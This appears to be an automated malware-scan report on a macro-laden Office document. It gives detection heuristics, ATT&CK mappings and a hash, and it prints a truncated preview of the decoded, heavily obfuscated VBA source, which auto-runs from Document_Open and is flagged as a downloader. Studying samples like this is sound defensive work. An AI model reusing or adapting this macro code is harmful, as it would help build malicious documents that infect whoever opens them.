Verdict: MALICIOUS
Risk score: 202

Malware insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, a common technique for executing malicious code as soon as the document is opened. The macro is heavily obfuscated, so its exact function is difficult to determine, but the presence of GetObject calls together with the ClamAV detection suggests it is a downloader. The macro itself is the primary IOC, as it contains the malicious logic.
Heuristics (6)

- ClamAV: Doc.Downloader.Generic-7469262-0 (severity: critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-7469262-0
- VBA macros detected (severity: medium; OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Document_Open macro (severity: high; OLE_VBA_DOCOPEN): Document_Open macro
- GetObject call (severity: high; OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (severity: high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (severity: info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13063 bytes |

SHA-256 of macros.bas: 4bc68be9c2fca5d56d9f715a70f7fab5a0ed833679ed8c1786794d7a14e97821
Preview: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "Fwbejxmnpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Vkzimturjeenc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Igsepqmehcbg As Double
Dim Rdtprsexwwvk As Boolean
Ieoffsnrpvso = Jelhfrhtsx
Nlkwjelqvc = (Ahgaoxxcdsnsk)
Nnpmqzueb = 814
Dim Mocxrhqphxkh As String
Achvyrlwyxdg = "Vitae nemo."
Dim Wfcftvljagafc As Double
Dim Hdgkrpxnj As Boolean
Dim Hqpetkrstbu As Boolean
Jjrbbuspqpq = (329)
Dim Wzhystcfnutvm As String
Dim Jbemysahxvm As Double
Zqazkworku = Civpygpe
Dim Pldvevrkc As String
Dim Rfwuukpbw As Boolean
Dim Ulvkeszpx As Double
Sbovorsza = (Wlcyuevz)
Hirsauqzk = ("Voluptas dicta voluptas eveniet velit quia.")
Vlnvfywxjw = (Qpkhgxvtxhz)
Dim Xdnxbaqfubzp As Integer
Fzbtkiuacqm = Otlnmbbh
Hbxnnickfa
Dim Ypfkuntosohqg As Boolean
Dim Uuwuwqrisaix As Boolean
Smhocapyki = Yaxkzbgit
Vtihhnjlqpf = (Abeudvjo)
Rqlhbgrvqsv = 161
Dim Utilawyttzwk As Integer
Lexpcofqqvfif = "Et aut dolorem."
Dim Oifofkbvkjri As String
Dim Qoxcjgrscsxpd As Boolean
Dim Frrzaerrws As Double
Jnglglszhi = (175)
Dim Sbwfmqqhyiera As Double
Dim Uyxakwwhevhr As String
Dfxlugyhme = Flajplxr
Dim Khvawtrk As String
Dim Mwvdgffbvmmsu As Boolean
Dim Khvgwtmmcvp As Integer
Keqczgpjqxck = (Wlormmjlmveig)
Siqokrqwks = ("Annie")
Gujtvqwpandd = (Yruyraozxp)
Dim Vefpezyscrcb As Boolean
Jkifenkztzbm = Ehwuiausklj
End Sub
Attribute VB_Name = "Camxdyzasov"
Attribute VB_Base = "0{68A08007-2EAE-489F-919A-1C699FE87B53}{A0DE910C-662B-4B56-98C9-1ADFD1F10E64}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Zohvecnk"
Function Aqxdtbyhiyvx()
Dim Qgrtpykc As Double
Dim Whtrphlwlmia As String
Hjjrvjsswb = Fnlyuonnuoq
Ahnferqqilfo = (Maelslzcx)
Sunbottvwub = 609
Dim Skqzxbfjag As Integer
Qcydvyjbsl = "Soluta voluptatem sed accusantium dolorum est distinctio labore et maxime."
Dim Ptsmtwmk As Integer
Dim Tiuzewfdrnmp As Double
Dim Urbwrdugnnk As Integer
Tpeuprzjqi = (865)
Dim Nwotjqzvbrbv As Boolean
Dim Rxmvhoanlont As Integer
Yhejfcehfndxk = Bnjewzcwv
Dim Tzkafptcx As Integer
Dim Sqnokrzrkds As Boolean
Dim Aepzywkjix As String
Wfhndilmo = (Qipkxdqebraa)
Tdajeksd = ("Placeat voluptatibus natus.")
Mrdgugvvfly = (Mnfrtinveg)
Dim Ekcjlamzax As Boolean
Jjuwfupb = Ovysyvvthlqw
Usapwstupbld = Fwbejxmnpj.Vkzimturjeenc
Dim Jzerzexnxts As Double
Dim Vwkayxoxqsfp As Double
Sheqirwlow = Rxctseirazn
Uupshycsuegs = (Jyjioskfru)
Bgpjstivowhsh = 135
Dim Vxsvaquzt As Double
Ydlpduvhxvc = "At dolorem asperiores facere."
Dim Njhvmrrbrn As String
Dim Yywjhhwtb As String
Dim Kytmxzajt As Double
Iriymbyph = (207)
Dim Hfvyxqogrjsdw As String
Dim Eucrdvurqfai As Integer
Ummpnroqycjv = Xpnmbtxenqmbn
Dim Twhtlxxgo As Integer
Dim Fnwzhiiyt As Double
Dim Ohaxpzwdleal As Double
Cbayzjzdw = (Injdsotebi)
Ohxkkxbecrue = ("Clay")
Aurslkloh = (Atpghcxchm)
Dim Zogvjhqt As Integer
Lozmjwphaalxk = Yupwczujrs
Cinneipqscq = Usapwstupbld + Camxdyzasov.Ompxvrkfqlvl + Camxdyzasov.Ydootfwvx + Camxdyzasov.Oiuvdbgtedkjs
Dim Myfyslebmximg As Double
Dim Ntoytxjyf As Double
Ajldeoleezyh = Lttkiirwfw
Vozcaajxk = (Jsubcyhplpp)
Qnwgdeep = 659
Dim Tweczxyayqdjs As Boolean
Oxyghrfgv = "Garrett"
Dim Dcugqazvafx As Boolean
Dim Rmprqahvi As String
Dim Ggjcgnpjrlu As String
Racjwnbrb = (172)
Dim Ucopudsvcfz As Boolean
Dim Xpmpnewxqizq As String
Yuyxfquhezzpn = Uaspkmhbmdwtr
Dim Ozvgtbdhuuxq As String
Dim Pyrdxwigbol As String
Dim Muixdcklathz As Integer
Syvmwvnwefp = (Lhyhucirn)
Unacofkeafpig = ("Reiciendis cumque.")
Vfpqchjtzdc = (Wpyfmxsivl)
Dim Vktcvzrgfgdbx As Double
Ktaymsxikhk = Igathqgxq
Tuimwnybwuiad = Cinneipqscq + Camxdyzasov.Vwczvberfmi + Camxdyzasov
```

... (truncated)